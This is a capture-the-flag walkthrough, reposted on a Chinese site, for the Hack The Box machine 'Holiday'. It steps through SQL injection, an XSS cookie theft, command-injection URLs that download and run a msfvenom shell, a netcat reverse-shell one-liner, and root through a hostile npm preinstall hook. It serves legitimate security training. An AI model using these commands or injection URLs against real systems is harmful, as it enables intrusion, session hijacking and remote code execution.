Holiday: hack the box

栏目: 编程工具 · 发布时间: 4年前

内容简介:Target: 10.10.10.25(Linux)Kali: 10.10.16.65

Holiday: hack the box

Introduction

Target: 10.10.10.25(Linux)

Kali: 10.10.16.65

Holiday is an insane box officially. It's really difficult to get the user permission. The most difficult part should be how to pass the XSS filter. It may need a lot of time. And the root privesc is based on the exploitation of npm install which is relatively fresh.

Information enumeration

As usual, use nmap to detect open ports and related services: nmap-A10.10.10.25 :

There are only two ports open. The port 8000 is an HTTP service which is hosted by Express. It should be our breakthrough.

Exploitation

Access to http://10.10.10.25:8000 , there is nothing except an image. Download the image, and try to see more information about the image with ExifTool. Nothing interesting found.

Holiday: hack the box

Then try to brute force the directory. Gobuster and dirbuster seem not to be very useful for this box. If you try dirb, you will soon find some important directories, including admin, login. Try to access http://10.10.10.25:8000/login . It is a login web page. Try to login with some default credentials. Not work. Then use burp to save the login request to a file.

Sqlmap

Try to use sqlmap to brute force the login request. Due to the awful network or something, sqlmap is slow for me to use for the boxed in hack the box. So try to prefer to get some important information instead of dump all information in sqlmap. For example, obtain tables firstly. Then dig into the interesting table.

Holiday: hack the box

By sqlmap, it seems that the database is SQLite and there are 5 tables. The users table is interesting. There may are some valid user and password.

Holiday: hack the box

A user is found. Hashkiller is a wonderful hash crack online tool. The hash can be cracked easily.

Holiday: hack the box

Log in with this user. It seems to be a booking website.

Holiday: hack the box

Holiday: hack the box

Click any booking and see the booking details. It consists of two tabs, including View and Notes. In Notes, one word is interesting: "All notes must be approved by an administrator - this process can take up to 1 minute." An administrator is always attractive to hackers. It seems that the note will be approved by the administrator. So it's possible to steal the session cookie of the administrator if there is an XSS vulnerability in the note edit form. I think it's the hardest part of this box. It's not easy to find the appropriate pass way. There is a way to utilize fromCharCode and other skills to pass the XSS filter. The following javascript code is utilized to generate the payload:

Holiday: hack the box

Set kali to listen to port 80: nc-lvnp80 . The code can be run in the chrome dev. Input the generated payload into the note, wait a minute the data will be sent to kali.

The cookie of the administrator is obtained which is HTML encoded. Decode it with a burp. And change the cookie in the storage of firefox. Refresh the web page. Now you can hijack the administrator session cookie. Access to http://10.10.10.25:8000/admin . There seems nothing special except two buttons, including Booking and Notes.

Holiday: hack the box

Holiday: hack the box

After some exploration, you will find that there is command injection in the two function url. You can try to access http://10.10.10.25:8000/admin/export?table=notes%26ls . You can find the directories in the exported file. One thing should be noticed, as & has been prohibited. So you can pass this by %26 . Hence, it seems that the table name exists RCE. But it's limited to characters, numbers and / . So you should try to RCE by these. It's not possible to use the command to obtain reverse shell by command. For example, rm/tmp/f;mkfifo/tmp/f;cat/tmp/f|/bin/sh-i2>&1|nc10.0.0.11234>/tmp/f . As many characters is not allowed.

Holiday: hack the box

Utilize msfvenom to generate the payload:

Then upload the shell to the victim and execute it. As you are not allowed to use . . So convert the IP address to decimal by this website. Access the following URLs to execute the corresponding commands:

  • upload shell:  http://10.10.10.25:8000/admin/export?table=notes%26cd%20/tmp%20%26%26wget%20168431681/shell

  • change permission:  http://10.10.10.25:8000/admin/export?table=notes%26chmod%20777%20/tmp/shell

  • execute shell:  http://10.10.10.25:8000/admin/export?table=notes%26cd%20/tmp/shell

Before running the shell, you should set meterpreter in Kaili.

Then, we get the shell!

Holiday: hack the box

Holiday: hack the box

Privilege escalation

Check the sudo permissions firstly: sudo-l . You will find the user has the permission to execute sudo npm i . rimrafall this repository has described that npm install may be dangerous. It can be utilized to execute commands. You can upload the directory to the victim or create one by yourself.

Create the package.json and upload it to the target directory. preinstall can be utilized to execute the command. I have found that some command to obtain a reverse shell is not useful. As Perl is installed in the machine. And create a file called prel3 to obtain the reverse shell.

Set kali listen to port 3344: nc-lvnp3344 . In the victim, executed by: sudo npm i rimrafall . Now, we are root!

Holiday: hack the box

可以扫描二维码或者搜索 mad_coder 关注微信公众号,点击阅读原文可以获取链接版原文。

Holiday: hack the box


以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持 码农网

查看所有标签

猜你喜欢:

本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们

代码之外的功夫

代码之外的功夫

[美] Gregory T. Brown / 李志 / 人民邮电出版社 / 2018-3-1 / 49.00元

本书虽然面向程序员,却不包含代码。在作者看来,90%的程序设计工作都不需要写代码;程序员不只是编程专家,其核心竞争力是利用代码这一工具解决人类社会的常见问题。以此作为出发点,作者精心构思了8个故事,以情景代入的方式邀请读者思考代码之外的关键问题:软件开发工作如何从以技术为中心转为以人为本?透过故事主人公的视角,读者能比较自己与书中角色的差异,发现决策过程的瑕疵,提升解决问题的综合能力。 书中......一起来看看 《代码之外的功夫》 这本书的介绍吧!

CSS 压缩/解压工具
CSS 压缩/解压工具

在线压缩/解压 CSS 代码

RGB HSV 转换
RGB HSV 转换

RGB HSV 互转工具

HSV CMYK 转换工具
HSV CMYK 转换工具

HSV CMYK互换工具